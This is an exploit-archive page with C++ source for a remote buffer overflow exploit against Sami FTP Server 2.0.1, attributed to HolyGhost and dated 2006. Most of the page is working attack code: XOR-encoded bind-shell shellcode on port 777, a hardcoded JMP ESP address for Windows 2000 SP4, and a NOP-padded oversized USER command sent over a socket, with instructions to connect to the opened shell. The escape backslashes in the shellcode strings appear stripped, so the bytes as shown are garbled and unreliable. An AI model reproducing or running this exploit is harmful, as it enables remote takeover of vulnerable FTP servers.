[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
# Published : 2006-01-31
# Author : HolyGhost
# Previous Title : Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)
# Next Title : SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
char MyShellCode[] = // XOR by x99x99x99x99.
"xD9xEExD9x74x24xF4x5Bx31xC9xB1x59x81x73x17x99x99"
"x99x99x83xEBxFCxE2" // Bind ShellCode port 777.
"xF4x71xA1x99x99x99xDAxD4xDDx99"
"x7ExE0x5FxE0x7CxD0x1FxD0x3Dx34xB7x70x3Dx83xE9x5E"
"x40x90x6Cx34x52x74x65xA2x17xD7x97x75xE7x41x7BxEA"
"x34x40x9Cx57xEBx67x2Ax8FxCExCAxABxC6xAAxABxB7xDD"
"xD5xD5x99x98xC2xCDx10x7Cx10xC4x99xF3xA9xC0xFDx12"
"x98x12xD9x95x12xE9x85x34x12xC1x91x72x95x14xCExB5"
"xC8xCBx66x49x10x5AxC0x72x89xF3x91xC7x98x77xF3x93"
"xC0x12xE4x99x19x60x9FxEDx7DxC8xCAx66xADx16x71x09"
"x99x99x99xC0x10x9Dx17x7Bx72xA8x66xFFx18x75x09x98"
"xCDxF1x98x98x99x99x66xCCxB9xCExCExCExCExDExCExDE"
"xCEx66xCCx85x10x5AxA8x66xCExCExF1x9Bx99x9Ax90x10"
"x7FxF3x89xCFxCAx66xCCx81xCExCAx66xCCx8DxCExCFxCA"
"x66xCCx89x10x5BxFFx18x75xCDx99x14xA5xBDxA8x59xF3"
"x8CxC0x6Ax32x10x4Ex5FxDDxBDx89xDDx67xDDxBDxA4x10"
"xE5xBDxD1x10xE5xBDxD5x10xE5xBDxC9x14xDDxBDx89xCD"
"xC9xC8xC8xC8xD8xC8xD0xC8xC8x66xECx99xC8x66xCCxA9"
"x10x78xF1x66x66x66x66x66xA8x66xCCxB5xCEx66xCCx95"
"x66xCCxB1xCAxCCxCFxCEx12xF5xBDx81x12xDCxA5x12xCD"
"x9CxE1x98x73x12xD3x81x12xC3xB9x98x72x7AxABxD0x12"
"xADx12x98x77xA8x66x65xA8x59x35xA1x79xEDx9Ex58x56"
"x94x98x5Ex72x6BxA2xE5xBDx8DxECx78x12xC3xBDx98x72"
"xFFx12x95xD2x12xC3x85x98x72x12x9Dx12x98x71x72x9B"
"xA8x59x10x73xC6xC7xC4xC2x5Bx91x99";
static char PayLoad[1329];
int IP;
int Port;
int szNOP1, szNOP2;
int Nop;
// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "x0CxEDxE3x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-rn220 Features p a .";
char RecvBuff[200];
void usage(){
cout<<" "<<endl;
cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]" <<endl;
cout<<"If a port isnt specified, default port will 21." <<endl;
cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
cout<<" "<<endl;
return;}
void Info(){
cout<<" "<<endl;
cout<<" ============================================== v1.0 =="<<endl;
cout<<" ====== Sami FTP Remote Buffer Overflow Exploit ======"<<endl;
cout<<" ================== Coded by HolyGhost ================"<<endl;
cout<<" ====== Distributed for educational purposes only ====="<<endl;
cout<<" ================== StormyTeam@free.fr ================"<<endl;
cout<<" ======================================================"<<endl;
cout<<" "<<endl;}
int main(int argc,char *argv[]){
Info();
if ( ( argc > 3 ) ){usage();return -1;}
if( argc > 1 ){
cout<<"argv[1]"<<"t"<<argv[1]<<endl;
IP = htonl( inet_addr( argv[1] ) );}
else{
cout<<"Local test mode : 127.0.0.1"<<endl;
IP = htonl( inet_addr( "127.0.0.1" ) );}
if( argc == 3 ){
cout<<"argv[2]"<<"t"<<argv[2]<<endl;
Port = atoi( argv[2] );}
else{
cout<<"Port by default : 21"<<endl;
Port = 21;}
WSADATA wsadata;
if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
cout<<"[-] WSAStartup error. Bye!"<<endl;
return -1;}
SOCKET sck;
fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.
if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );
timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );
switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
case -1:{ // Problem!
cout<<"[-] Select() error. Bye!"<<endl;
closesocket( sck );
return -1;}
case 0:{ // Problem!
cout<<"[-] Connect() error. Bye!"<<endl;
closesocket( sck );
return -1;}
default:
if(FD_ISSET( sck, &mask ) ){
recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.
cout<<"[+] Connected, checking the server for flag..."<<endl;
Sleep( 500 );
if ( !strstr( RecvBuff, TargetFlag ) ){
cout<<"[-] This is not a valid flag from target! Bye."<<endl;
return -1;} // Bye!
cout<<RecvBuff;
Sleep( 1000 );
cout<<"[+] Connected, constructing the PayLoad..."<<endl;
szNOP1 = 219; // First padding.
szNOP2 = 720; // Second padding.
// Initialise le Buffer PayLoad NULL.
memset( PayLoad, NULL, sizeof( PayLoad ) );
strcat( PayLoad, "USER " ); // Command User.
// First padding.
for( Nop = 0; Nop < szNOP1; Nop++ ){
strcat( PayLoad, "x90" );}
// New EIP register.
strcat( PayLoad, JmpESP );
// Second Padding.
for( Nop = 0; Nop < szNOP2; Nop++ ){
strcat( PayLoad, "x90" );}
strcat( PayLoad, MyShellCode );
strcat( PayLoad, "x0Dx0A" );
// Send fully PayLoad.
if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
cout<<"[-] Sending error, the server prolly rebooted."<<endl;
return -1;}
Sleep( 1000 );
cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
return 0;
}
}
closesocket( sck );
WSACleanup();
return 0; // Bye!
}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [rn]
// 5 219 4 720 379 2
// www.Syue.com [2006-01-31]